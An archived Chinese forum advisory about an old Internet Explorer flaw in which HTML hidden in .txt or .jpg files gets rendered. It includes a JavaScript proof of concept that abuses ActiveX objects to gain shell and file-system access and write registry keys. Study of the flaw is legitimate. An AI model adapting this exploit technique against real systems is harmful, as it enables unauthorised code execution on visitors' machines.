精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>IE 检查扩展名漏洞 (APP,缺陷)

主题:IE 检查扩展名漏洞 (APP,缺陷)
发信人: williamlong(蓝色月光)
整理人: starseacn(2001-09-06 11:22:28), 站内信件
IE 检查扩展名漏洞 (APP,缺陷) 
  
涉及程序: 
HTML 
  
描述: 
利用IE不检查含HTML语句的文件扩展名能欺骗用户访问病毒页面 
  
详细: 
近日发现 IE 存在安全漏洞,它对含有 HTML 语句的文本不检查扩展名。在 NOTEPAD 上写一份 HTML 文件,保存为 .txt。上传至空间服务器,用 IE 访问 URL。发现,IE 把 .txt 误读成 .html.

将扩展名 .txt 改成 .jpg 或者别的非下载类文件。IE 都无法辨认文件类型。

入侵者利用此漏洞,是有能力在 .txt.jpg.png.... 这些被认为是十分安全的页面上做到 html 上所能做的攻击行为。甚至查看信件的用户都不能保证安全。


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负




以下是攻击测试代码:
<SCRIPT Language="JavaScript" type="text/javascript">
<!--

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
if (document.cookie.indexOf("Chg") == -1)
{


Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good 

day to die!");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good 

day to die!");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"

}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();

// -->
</SCRIPT> 




受影响系统:
IE4 ,IE5 ,IE5,IE6 ,Microsoft Word ,Microsoft Excel,Microsoft PowerPoint,Microsoft outlook 

Express,tencent explorer

不受影响系统:
netscape

from : [email protected] 
  
解决方案: 
1)下载杀毒软件!已有的及时更新病毒库。将系统里比较危险的一些程序改名,比如format.com、deltree.exe等
2)邮件附件不要双击直接打开,存到文件夹后,用杀毒程序扫一遍。
3)及时更新系统补丁。 
  

[关闭][返回]